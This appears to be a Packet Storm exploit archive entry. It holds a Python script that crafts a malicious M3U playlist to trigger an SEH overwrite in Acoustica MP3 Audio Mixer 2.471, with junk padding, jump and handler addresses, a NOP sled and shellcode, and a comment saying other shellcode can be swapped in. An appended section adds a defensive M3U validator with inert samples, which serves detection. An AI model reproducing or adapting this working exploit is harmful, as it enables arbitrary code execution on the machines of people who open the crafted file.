Acoustica MP3 Audio Mixer 2.471 SEH Overwrite

2010-09-11T00:00:00
ID PACKETSTORM:93736
Type packetstorm
Reporter Carlos Hollmann
Modified 2010-09-11T00:00:00

Description

                                        
`# Exploit Title: Acoustica MP3 Audio Mixer 2.471 Extended M3U directives SEH  
# Date: September 8 2010  
# Author: Carlos Hollmann  
# Software Link: http://www.acoustica.com/downloading.asp?p=1  
# Version: 2.471  
# Tested on: Windows XP SP3 running on VMware Fusion 3.1 and VirtualBox 3.2.8  
# CVE :  
  
  
# ________ _ _________ ____ __ _____ ________  
# / ____/ / | | / / ____/ | / / //_// _/ | / / ____/  
# / __/ / / | | / / __/ / |/ / ,< / // |/ / / __   
# / /___/ /___| |/ / /___/ /| / /| |_/ // /| / /_/ /   
#/_____/_____/|___/_____/_/ |_/_/ |_/___/_/ |_/\____/   
  
# COLOMBIA presents.............  
# PoC from D3V!L FucK3r http://www.exploit-db.com/exploits/9213/  
#  
# Carlos Mario Penagos Hollmann A.K.A Elvenking shogilord@gmail.com  
# Extended M3U directives  
  
# Background from http://hanna.pyxidis.org/tech/m3u.html  
  
  
  
# The software doesn't correctly handle the M3U header and extra info when the file is imported into an open sound group.  
# Trigger: launch app, open an existing sound group, i.e. (C:\Program Files\Acoustica MP3 Audio Mixer\example.sgp), then import the crash.m3u and....KaaaaBooom!!  
#  
#   
# Greetings: My Family, Algeria-->sud0 Australia--> tecr0c,Peru-->fataku,Spain-->Alberto Hervalejo, OFFSEC TEAM and all my friends in Colombia  
# !!! PAZ PARA MI PAIS PAZ PARA COLOMBIA !!! Freedom!!  
  
  
  
  
# Script provided 'as is', without any warranty.  
# Use for educational purposes only.  
# Do not use this code to do anything illegal !  
# I do not want anyone to use this script  
# for malicious and/or illegal purposes  
# I cannot be held responsible for any illegal use.  
  
# Note : you are not allowed to edit/modify this code.  
# If you do, I will not be held responsible for any damages this may cause.  
  
#!/usr/bin/python  
  
  
magic = "crash.m3u"  
  
  
vuln = "\x23\x0D\x0A\x23\x0D\x0A" # Extended M3U, no EXTM3U, no EXTINF, can change 0D for any value \x1b,\x0a.........  
  
  
junk = "\x41" * 816  
ds_eax = "\x25\x25\x47\x7E" #First Call ds:[eax+8], Writeable memory address to put in EAX  
morejunk = "\x42" * 8308  
nSEH = "\xEB\x06\x90\x90" #short jmp 6 bytes  
SEH = "\x3F\x28\xD1\x72"#SEH Handler  
nops = "\x90" * 10 #landing pad  
shellcode = "\x8b\xec\x55\x8b\xec\x68\x20\x20\x20\x2f\x68\x63\x61\x6c\x63\x8d\x45\xf8\x50\xb8\xc7\x93\xc2\x77\xff\xd0" # Thanks sud0, any other shell works too just remove "\x00\x0a"  
payload = vuln+junk+ds_eax+morejunk+nSEH+SEH+nops+shellcode  
  
file = open(magic , 'w')  
file.write(payload)  
file.close()  
  
`
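
A defender-side check for the malformed playlist described above, as an added example that is not part of the original advisory or the author's code: it flags '#' lines without an #EXTM3U header, over-long lines and control bytes in raw M3U data before the file reaches a media application. The 1024-byte limit, the name inspect_m3u and both sample playlists are assumptions constructed for illustration.

```python
import re

MAX_LINE = 1024  # assumed ceiling; tune to the longest path or URL you accept
# Control bytes that have no place in a playlist line (tab, CR and LF excluded).
CONTROL = re.compile(rb"[\x00-\x08\x0b\x0c\x0e-\x1f\x7f]")


def inspect_m3u(data, max_line=MAX_LINE):
    """Return (line_number, reason) findings for raw M3U bytes.

    Line number 0 marks a file-level finding.
    """
    findings = []
    lines = re.split(rb"\r\n|\r|\n", data)
    entries = [l for l in lines if l.strip()]
    # The advisory's trigger uses '#' lines with no #EXTM3U / #EXTINF at all.
    has_hash_lines = any(l.startswith(b"#") for l in entries)
    if has_hash_lines and not entries[0].startswith(b"#EXTM3U"):
        findings.append((0, "'#' lines present but no #EXTM3U header"))
    for n, line in enumerate(lines, 1):
        if len(line) > max_line:
            findings.append(
                (n, "line of %d bytes exceeds %d" % (len(line), max_line)))
        if CONTROL.search(line):
            findings.append((n, "control byte in line"))
        if line.startswith(b"#EXTINF:") and b"," not in line:
            findings.append((n, "#EXTINF without 'duration,title'"))
    return findings


# Constructed sample: a well-formed extended playlist.
GOOD = b"#EXTM3U\r\n#EXTINF:123,Artist - Title\r\nC:\\Music\\track01.mp3\r\n"

# Constructed sample: same shape as the file described above (two bare '#'
# lines, then one very long line), filled with inert bytes only.
BAD = b"#\r\n#\r\n" + b"A" * 9000 + b"\x1b\x7f" + b"\r\n"

if __name__ == "__main__":
    for name, blob in (("GOOD", GOOD), ("BAD", BAD)):
        print(name, inspect_m3u(blob))
```

Run it over playlists at the point they enter the environment (mail gateway, download folder, file share); a finding is a reason to quarantine the file, not proof of an exploit attempt.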